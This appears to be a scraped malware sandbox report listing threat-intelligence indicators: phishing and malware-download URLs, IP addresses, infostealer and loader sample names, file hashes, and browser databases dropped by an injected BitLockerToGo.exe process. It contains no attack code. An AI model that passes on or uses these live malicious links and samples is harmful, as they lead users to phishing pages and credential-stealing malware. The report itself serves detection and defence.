13.107.246.45 | https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4 | malicious | HTMLPhisher | nam.dcv.ms/BxPVLH2cz4
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s3-w.us-east-1.amazonaws.com | https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9 | malicious | Unknown | 52.216.105.187
 | https://bbva-es.ayuda-acceso.com | malicious | Unknown | 52.217.132.225
                                                                                                                                                                                                                                                                                                                                    http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.5.29.148
                                                                                                                                                                                                                                                                                                                                    https://temp.farenheit.net/XNmRkL0JpUmxBQTZuV2tIZUROa0lqeFhjbUlHS1FUR2d2YjZVKzQrNmxLeGxNOWRBLzMrc0pQRERZejVvZTA2ZENOTU5qV1hoaG1oL2JqQit5cE9DdEs1OS9NbVRVQUlObzNpVFlGMmZDT2lrWUVmeGVHNHU4REdtb04vME5iTDZBbVZ5cVc3ZXRxVnE1YkE0eWd3Z3RFVFYvWXh2OHJGRTVOaTJ5b0pPVEpsNDhXZnM5M1B2S3RPYU54MjZCRENPdjJ5bGl6bmxDc3IvOW1Ub3JsaXpaTWRsU0FlcU1pU2NzbzdrcXc9PS0tRTRqMzk0TUpka2xBNHo0Wi0tMTBZdXRlVmpmTWI1WnVlQkhpazZ1dz09?cid=2268024181Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                                                                                    • 52.217.68.44
                                                                                                                                                                                                                                                                                                                                    Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                    • 54.231.138.185
                                                                                                                                                                                                                                                                                                                                    90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.5.11.187
                                                                                                                                                                                                                                                                                                                                    Purchase_order08112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.5.25.172
                                                                                                                                                                                                                                                                                                                                    asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.5.27.34
                                                                                                                                                                                                                                                                                                                                    bitbucket.orgSelected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                                                                                                                                                                                    90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                                                                                                                                                                                    Purchase_order08112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                                                                                                                                                                                    asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                                                                                                                                                                                    FmmYUD4pt7.wsfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                                                                                                                                                                                    2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                                                                                                                                                                                    vVVLp9JVxK.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                                                                                                                                                                                    company profile and iems .vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                                                                                                                                                                                    https://bitbucket.org/socialinformationonline/love/downloads/Statement-963462.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                                                                                                                                                                                    https://bitbucket.org/thanksforusingourwebsite/serv/downloads/Statement-415322025.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                                                                                                                                                                                    chrome.cloudflare-dns.comfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                    https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                    aba5298f.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    AMAZON-02UShttps://dev.terraingroup.smithmarketing.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVMyeEZVV0k9JnVpZD1VU0VSMDgxMTIwMjRVMDcxMTA4MzM=N0123Nbryan.allee@centraltrust.netGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                    • 13.35.58.91
                                                                                                                                                                                                                                                                                                                                    https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 76.223.1.166
                                                                                                                                                                                                                                                                                                                                    Invitation Letter from Ministry of Defence China.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                    • 18.245.46.25
                                                                                                                                                                                                                                                                                                                                    https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 18.245.86.109
                                                                                                                                                                                                                                                                                                                                    Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                                                                                                                                                                                                    • 13.35.58.71
                                                                                                                                                                                                                                                                                                                                    yakuza.i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                    • 54.188.223.161
                                                                                                                                                                                                                                                                                                                                    yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                    • 54.217.84.115
                                                                                                                                                                                                                                                                                                                                    yakuza.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.127.110.58
                                                                                                                                                                                                                                                                                                                                    yakuza.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                    • 3.112.29.52
                                                                                                                                                                                                                                                                                                                                    https://bbva-es.ayuda-acceso.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 108.138.7.94
                                                                                                                                                                                                                                                                                                                                    CLOUDFLARENETUSView Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                                                                                                    https://dev.terraingroup.smithmarketing.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPVMyeEZVV0k9JnVpZD1VU0VSMDgxMTIwMjRVMDcxMTA4MzM=N0123Nbryan.allee@centraltrust.netGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                                                                                                    https://desertgarprodentalbdenmontessori.sharefile.com/public/share/web-sc0171e76f26940ab83813f90c639bcc9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.67.74.152
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.67.174.133
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.67.174.133
                                                                                                                                                                                                                                                                                                                                    Invitation Letter from Ministry of Defence China.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                    • 104.16.123.96
                                                                                                                                                                                                                                                                                                                                    https://assets.trabiancdn.com/api/file/gPjjDRAdRBCXwHm7Mpzt+dacotah.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                                                                                                                                    JD & Application Form_A (910).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Transfer Copy Invoice92384747swift.com.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                                                    INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                                    • 172.66.0.235
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
                                                                                                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    https://google-databricks.com/?uniq_id=b92ZeoMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                    • 20.109.210.53
                                                                                                                                                                                                                                                                                                                                    • 13.107.246.45
                                                                                                                                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    Towservicesst.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    z5dejE5wp9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    JaDheaBFXI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
                                                                                                                                                                                                                                                                                                                                    OD5lecPHBl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                                    • 51.105.71.136
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\freebl3.dll | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | Amadey, Stealc, Vidar
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | Amadey, Stealc, Vidar
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
file.exe | malicious | Stealc, Vidar
file.exe | malicious | Amadey, Stealc, Vidar
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):11695088
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.8917166271540635
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:196608:BEbYJP+JnMFs2AhO2uqRJar8hknJnMWT1wbPdLTM5aGeSHNy9Ohcs0aMKgk3LQ1:bJW9MshOXkaIKJnMwYoaVSHasNM4s1
                                                                                                                                                                                                                                                                                                                                                        MD5:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        SHA1:258FBCDB22474274B21435AA3DA5F95023F363BD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9A58D77F6060DFBF514C5113BBC6381C128D16921B43A808D65BCC2DFDDEC408
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DC43D6966A7C6B9E3ECF20703FC154C9400F1A5ED7F6EDD1A8C0D906CD526C184694D98E51DA165F73525095AF38BDCD8DFF1BF383687410068F8840A4CD66F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....'g.........."......$....Q...............@..............................B..........`.................................................H...P....0A.l.....A.$....V....... A. ..............................(...P.A.8...........................................text....".......................... ..`.rdata..$2...@......................@..@.data.....O.........................@....pdata.......`Q.....................@..@.00cfg.......pQ.....................@..@.tls..........Q.....................@....vmp.$.>=...Q..................... ..`.vmp.$............................@....vmp.$.6.......8..................`..h.reloc.. .... A......B..............@..@.rsrc...l....0A......D..............@..@................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2650730008431657
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:8/2qOB1nxCkMiSAELyKOMq+8yC8F/YfU5m+OlTLVum+L:Bq+n0Ji9ELyKOMq+8y9/OwZ
                                                                                                                                                                                                                                                                                                                                                        MD5:410720ACA4AEAEBA460DE2C1A01AA74B
                                                                                                                                                                                                                                                                                                                                                        SHA1:93DA12CF09C66519DC4DAAA6C8B654B6FD77C9AB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD42AB98A3236EB77D3D655E84FD9579BD73F758DA16F5D23AD366798ABCC5C8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1DDA02B7295A5E48A77A4429E1DC23432644A390E346A4DD8EE7E19697D0EDC0F4048B380F5DD037F8CCBD438ACD2F1D41B5BA99E5D31FC46CB06B0E1BDE7B08
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
